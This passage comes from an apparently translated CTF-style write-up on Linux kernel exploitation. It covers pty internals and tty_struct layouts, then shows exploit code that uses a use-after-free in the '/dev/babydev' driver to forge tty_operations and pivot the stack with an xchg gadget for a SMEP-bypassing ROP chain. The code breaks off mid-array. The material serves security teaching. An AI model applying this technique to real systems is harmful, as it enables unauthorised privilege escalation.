class="line">58</span><br><span class="line">59</span><br><span 
class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Create pseudo tty master slave pair and set terminal attributes</span></span><br><span class="line"><span class="comment">   according to TERMP and WINP.  Return handles for both ends in</span></span><br><span class="line"><span class="comment">   AMASTER and ASLAVE, and return the name of the slave end in NAME.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">openpty</span> <span class="params">(<span class="type">int</span> *amaster, <span class="type">int</span> *aslave, <span class="type">char</span> *name,</span></span></span><br><span class="line"><span class="params"><span class="function">  <span class="type">const</span> <span class="keyword">struct</span> termios *termp, <span class="type">const</span> <span class="keyword">struct</span> winsize *winp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> PATH_MAX</span></span><br><span class="line">  <span class="type">char</span> _buf[PATH_MAX];</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">  <span class="type">char</span> _buf[<span 
class="number">512</span>];</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">char</span> *buf = _buf;</span><br><span class="line">  <span class="type">int</span> master, ret = <span class="number">-1</span>, slave = <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  *buf = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">  master = <span class="built_in">getpt</span> ();</span><br><span class="line">  <span class="keyword">if</span> (master == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">grantpt</span> (master))</span><br><span class="line">    <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">unlockpt</span> (master))</span><br><span class="line">    <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCGPTPEER</span></span><br><span class="line">  <span class="comment">/* Try to allocate slave fd solely based on master fd first. 
*/</span></span><br><span class="line">  slave = <span class="built_in">ioctl</span> (master, TIOCGPTPEER, O_RDWR | O_NOCTTY);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">if</span> (slave == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">/* Fallback to path-based slave fd allocation in case kernel doesn&#x27;t</span></span><br><span class="line"><span class="comment">       * support TIOCGPTPEER.</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">pts_name</span> (master, &amp;buf, <span class="built_in">sizeof</span> (_buf)))</span><br><span class="line">        <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">      slave = <span class="built_in">open</span> (buf, O_RDWR | O_NOCTTY);</span><br><span class="line">      <span class="keyword">if</span> (slave == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">goto</span> on_error;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* XXX Should we ignore errors here?  
*/</span></span><br><span class="line">  <span class="keyword">if</span> (termp)</span><br><span class="line">    <span class="built_in">tcsetattr</span> (slave, TCSAFLUSH, termp);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCSWINSZ</span></span><br><span class="line">  <span class="keyword">if</span> (winp)</span><br><span class="line">    <span class="built_in">ioctl</span> (slave, TIOCSWINSZ, winp);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  *amaster = master;</span><br><span class="line">  *aslave = slave;</span><br><span class="line">  <span class="keyword">if</span> (name != <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (*buf == <span class="string">&#x27;\0&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pts_name</span> (master, &amp;buf, <span class="built_in">sizeof</span> (_buf)))</span><br><span class="line">          <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">      <span class="built_in">strcpy</span> (name, buf);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  ret = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> on_error:</span><br><span class="line">  <span class="keyword">if</span> (ret == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">close</span> (master);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (slave != <span class="number">-1</span>)</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line">  &#125;</span><br><span 
class="line"></span><br><span class="line">  <span class="keyword">if</span> (buf != _buf)</span><br><span class="line">    <span class="built_in">free</span> (buf);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>login_tty</code>: starts a login session on the specified terminal. The source code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">login_tty</span> <span class="params">(<span class="type">int</span> fd)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// start a new session</span></span><br><span class="line">  
(<span class="type">void</span>) <span class="built_in">setsid</span>();</span><br><span class="line">    <span class="comment">// make fd the controlling terminal</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCSCTTY</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">ioctl</span>(fd, TIOCSCTTY, (<span class="type">char</span> *)<span class="literal">NULL</span>) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> (<span class="number">-1</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">/* This might work.  */</span></span><br><span class="line">    <span class="type">char</span> *fdname = <span class="built_in">ttyname</span> (fd);</span><br><span class="line">    <span class="type">int</span> newfd;</span><br><span class="line">    <span class="keyword">if</span> (fdname)</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">0</span>)</span><br><span class="line">          (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">0</span>);</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">1</span>)</span><br><span class="line">          (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">1</span>);</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">2</span>)</span><br><span class="line">          (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">2</span>);</span><br><span class="line">        newfd = <span class="built_in">open</span> (fdname, O_RDWR);</span><br><span class="line">        (<span class="type">void</span>) <span 
class="built_in">close</span> (newfd);</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">0</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">1</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">2</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> (fd &gt; <span class="number">2</span>)</span><br><span class="line">    (<span class="type">void</span>) <span class="built_in">close</span>(fd);</span><br><span class="line">  <span class="keyword">return</span> (<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>forkpty</code>: combines <code>openpty</code>, <code>fork</code>, and <code>login_tty</code>. A network service program can use it to open a pseudoterminal pair for a newly logged-in user and create the corresponding session child process. The source code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">forkpty</span> <span class="params">(<span class="type">int</span> *amaster, <span class="type">char</span> *name, <span class="type">const</span> <span class="keyword">struct</span> termios *termp,</span></span></span><br><span class="line"><span class="params"><span class="function">   <span class="type">const</span> <span class="keyword">struct</span> winsize *winp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> master, slave, pid;</span><br><span class="line">  <span class="comment">// Open a new pty pair</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">openpty</span> (&amp;master, &amp;slave, name, termp, winp) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">switch</span> (pid = fork ())</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">-1</span>:</span><br><span class="line">      <span class="built_in">close</span> (master);</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line">      <span 
class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">      <span class="comment">/* Child.  */</span></span><br><span class="line">      <span class="built_in">close</span> (master);</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">login_tty</span> (slave))</span><br><span class="line">  _exit (<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">      <span class="comment">/* Parent.  */</span></span><br><span class="line">      *amaster = master;</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> pid;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="3-tty-struct-结构的利用">3) Exploiting the tty_struct structure</h5><p>When we execute <code>open(&quot;/dev/ptmx&quot;, flag)</code>, the kernel allocates a <code>struct tty_struct</code> through the following call chain:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ptmx_open (drivers/tty/pty.c)</span><br><span class="line">-&gt; tty_init_dev (drivers/tty/tty_io.c)</span><br><span class="line">  -&gt; alloc_tty_struct (drivers/tty/tty_io.c)</span><br></pre></td></tr></table></figure><p><code>struct tty_struct</code> is defined as follows:</p><blockquote><p>sizeof(struct tty_struct) == 0x2e0</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">tty_struct</span> &#123;</span><br><span class="line">  <span class="type">int</span>  
magic;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">kref</span> kref;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">device</span> *dev;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_driver</span> *driver;</span><br><span class="line">  <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">tty_operations</span> *ops;</span><br><span class="line">  <span class="type">int</span> index;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Protects ldisc changes: Lock tty not pty */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">ld_semaphore</span> ldisc_sem;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_ldisc</span> *ldisc;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> atomic_write_lock;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> legacy_mutex;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> throttle_mutex;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">rw_semaphore</span> termios_rwsem;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> winsize_mutex;</span><br><span class="line">  <span class="type">spinlock_t</span> ctrl_lock;</span><br><span class="line">  <span class="type">spinlock_t</span> flow_lock;</span><br><span class="line">  <span class="comment">/* Termios values are protected by the termios rwsem */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">ktermios</span> 
termios, termios_locked;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">termiox</span> *termiox;  <span class="comment">/* May be NULL for unsupported */</span></span><br><span class="line">  <span class="type">char</span> name[<span class="number">64</span>];</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">pid</span> *pgrp;    <span class="comment">/* Protected by ctrl lock */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">pid</span> *session;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> flags;</span><br><span class="line">  <span class="type">int</span> count;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">winsize</span> winsize;    <span class="comment">/* winsize_mutex */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> stopped:<span class="number">1</span>,  <span class="comment">/* flow_lock */</span></span><br><span class="line">          flow_stopped:<span class="number">1</span>,</span><br><span class="line">          unused:BITS_PER_LONG - <span class="number">2</span>;</span><br><span class="line">  <span class="type">int</span> hw_stopped;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> ctrl_status:<span class="number">8</span>,  <span class="comment">/* ctrl_lock */</span></span><br><span class="line">          packet:<span class="number">1</span>,</span><br><span class="line">          unused_ctrl:BITS_PER_LONG - <span class="number">9</span>;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> receive_room;  <span class="comment">/* Bytes free for queue */</span></span><br><span class="line">  <span class="type">int</span> flow_change;</span><br><span 
class="line"></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_struct</span> *link;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync;</span><br><span class="line">  <span class="type">int</span> alt_speed;    <span class="comment">/* For magic substitution of 38400 bps */</span></span><br><span class="line">  <span class="type">wait_queue_head_t</span> write_wait;</span><br><span class="line">  <span class="type">wait_queue_head_t</span> read_wait;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">work_struct</span> hangup_work;</span><br><span class="line">  <span class="type">void</span> *disc_data;</span><br><span class="line">  <span class="type">void</span> *driver_data;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">list_head</span> tty_files;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> N_TTY_BUF_SIZE 4096</span></span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> closing;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> *write_buf;</span><br><span class="line">  <span class="type">int</span> write_cnt;</span><br><span class="line">  <span class="comment">/* If the tty has a pending do_SAK, queue it here - akpm */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">work_struct</span> SAK_work;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_port</span> *port;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Note the fifth field, <code>const struct tty_operations *ops</code>. <code>struct tty_operations</code> is essentially a collection of function pointers:</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">tty_operations</span> &#123;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_struct</span> * (*lookup)(<span class="keyword">struct</span> tty_driver *driver,</span><br><span class="line">      <span class="keyword">struct</span> inode *inode, <span class="type">int</span> idx);</span><br><span class="line">  <span class="built_in">int</span>  (*install)(<span class="keyword">struct</span> tty_driver *driver, 
<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*remove)(<span class="keyword">struct</span> tty_driver *driver, <span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*open)(<span class="keyword">struct</span> tty_struct * tty, <span class="keyword">struct</span> file * filp);</span><br><span class="line">  <span class="built_in">void</span> (*close)(<span class="keyword">struct</span> tty_struct * tty, <span class="keyword">struct</span> file * filp);</span><br><span class="line">  <span class="built_in">void</span> (*shutdown)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*cleanup)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*write)(<span class="keyword">struct</span> tty_struct * tty,</span><br><span class="line">          <span class="type">const</span> <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">int</span> count);</span><br><span class="line">  <span class="built_in">int</span>  (*put_char)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">unsigned</span> <span class="type">char</span> ch);</span><br><span class="line">  <span class="built_in">void</span> (*flush_chars)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*write_room)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*chars_in_buffer)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*ioctl)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">        <span class="type">unsigned</span> <span 
class="type">int</span> cmd, <span class="type">unsigned</span> <span class="type">long</span> arg);</span><br><span class="line">  <span class="built_in">long</span> (*compat_ioctl)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">           <span class="type">unsigned</span> <span class="type">int</span> cmd, <span class="type">unsigned</span> <span class="type">long</span> arg);</span><br><span class="line">  <span class="built_in">void</span> (*set_termios)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> ktermios * old);</span><br><span class="line">  <span class="built_in">void</span> (*throttle)(<span class="keyword">struct</span> tty_struct * tty);</span><br><span class="line">  <span class="built_in">void</span> (*unthrottle)(<span class="keyword">struct</span> tty_struct * tty);</span><br><span class="line">  <span class="built_in">void</span> (*stop)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*start)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*hangup)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span> (*break_ctl)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">int</span> state);</span><br><span class="line">  <span class="built_in">void</span> (*flush_buffer)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*set_ldisc)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*wait_until_sent)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">int</span> timeout);</span><br><span class="line">  <span class="built_in">void</span> (*send_xchar)(<span class="keyword">struct</span> 
tty_struct *tty, <span class="type">char</span> ch);</span><br><span class="line">  <span class="built_in">int</span> (*tiocmget)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span> (*tiocmset)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">      <span class="type">unsigned</span> <span class="type">int</span> set, <span class="type">unsigned</span> <span class="type">int</span> clear);</span><br><span class="line">  <span class="built_in">int</span> (*resize)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> winsize *ws);</span><br><span class="line">  <span class="built_in">int</span> (*set_termiox)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> termiox *tnew);</span><br><span class="line">  <span class="built_in">int</span> (*get_icount)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">        <span class="keyword">struct</span> serial_icounter_struct *icount);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_CONSOLE_POLL</span></span><br><span class="line">  <span class="built_in">int</span> (*poll_init)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line, <span class="type">char</span> *options);</span><br><span class="line">  <span class="built_in">int</span> (*poll_get_char)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line);</span><br><span class="line">  <span class="built_in">void</span> (*poll_put_char)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line, <span class="type">char</span> ch);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">const</span> <span class="keyword">struct</span> <span 
class="title class_">file_operations</span> *proc_fops;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Through the UAF, we can try to overwrite the <code>const struct tty_operations *ops</code> field of the <strong>newly</strong> allocated tty_struct so that it points to a forged <code>tty_operations</code> structure. Triggering an operation on the tty (for example open or ioctl) then hijacks control flow.</p><blockquote><p>Note: the tty_operations function pointers are invoked from the various <code>tty_xxx</code> functions in <code>drivers/tty/tty_io.c</code>.</p></blockquote><p>However, because SMEP is enabled, the hijacked control flow <strong>can only execute kernel code</strong> and cannot jump to user code.</p><h5 id="4-ROP-利用">4) ROP exploitation</h5><p>To escalate privileges, we need to accomplish the following:</p><ol><li>Escalate privileges</li><li>Bypass SMEP and execute user code</li></ol><h6 id="4-1-劫持栈指针">4.1) Hijacking the stack pointer</h6><p>We need ROP to do this, but the problem is that <strong>user space cannot control the kernel stack</strong>. We therefore need a special gadget to <strong>pivot the stack pointer into user space</strong>, and then drive control flow with a ROP chain placed in user memory.</p><p>There are many ways to find gadgets. One is the <code>ROPgadget</code> tool used earlier. Its output can be redirected to a file, but it runs very slowly on a kernel-sized binary.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary vmlinux</span><br></pre></td></tr></table></figure><p>A faster alternative worth trying is <code>ropper</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip3 install ropper</span><br><span class="line">ropper --file vmlinux --console</span><br></pre></td></tr></table></figure><p>We can hand-craft a <strong>fake_tty_operations</strong> whose <code>write</code> function pointer points to an xchg gadget. When a write is then performed on <code>/dev/ptmx</code>, the kernel follows this call chain:</p><blockquote><p><code>tty_write</code> -&gt; <code>do_tty_write</code> -&gt; <code>n_tty_write</code> -&gt;  <code>tty-&gt;ops-&gt;write</code></p></blockquote><p>which dereferences the <code>tty-&gt;ops-&gt;write</code> function pointer and ends up executing the <code>xchg</code> instruction.</p><p>But which xchg instruction should we use? Dynamic debugging combined with static analysis in IDA locates the instruction that actually calls <code>tty-&gt;ops-&gt;write</code>:</p><figure class="highlight 
x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.text:</span>FFFFFFFF814DC0C3                 <span class="keyword">call</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rax</span>+<span class="number">38h</span>]</span><br></pre></td></tr></table></figure><p>When execution reaches this point, <code>%rax</code> is the only register under user control (it holds the base address of <code>fake_tty_operations</code>), so we use the following gadget to pivot <code>%rsp</code> into user space:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0xffffffff8100008a</span> : <span class="keyword">xchg</span> <span class="built_in">eax</span>, <span class="built_in">esp</span> <span class="comment">; ret</span></span><br></pre></td></tr></table></figure><blockquote><p>Note: <code>xchg eax, esp</code> <strong>clears the upper 32 bits of both registers</strong>. After it executes, the upper four bytes of %rsp are 0, so %rsp holds the low 32 bits of the old %rax and points into user space. We can map that memory with mmap and place the ROP chain there.</p></blockquote><p>The stack-pivot part of the exploit is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line"><span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line"><span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Allocate a tty_struct</span></span><br><span class="line"><span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Build a fake tty_operations</span></span><br><span class="line"><span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">    <span class="number">0</span>, <span 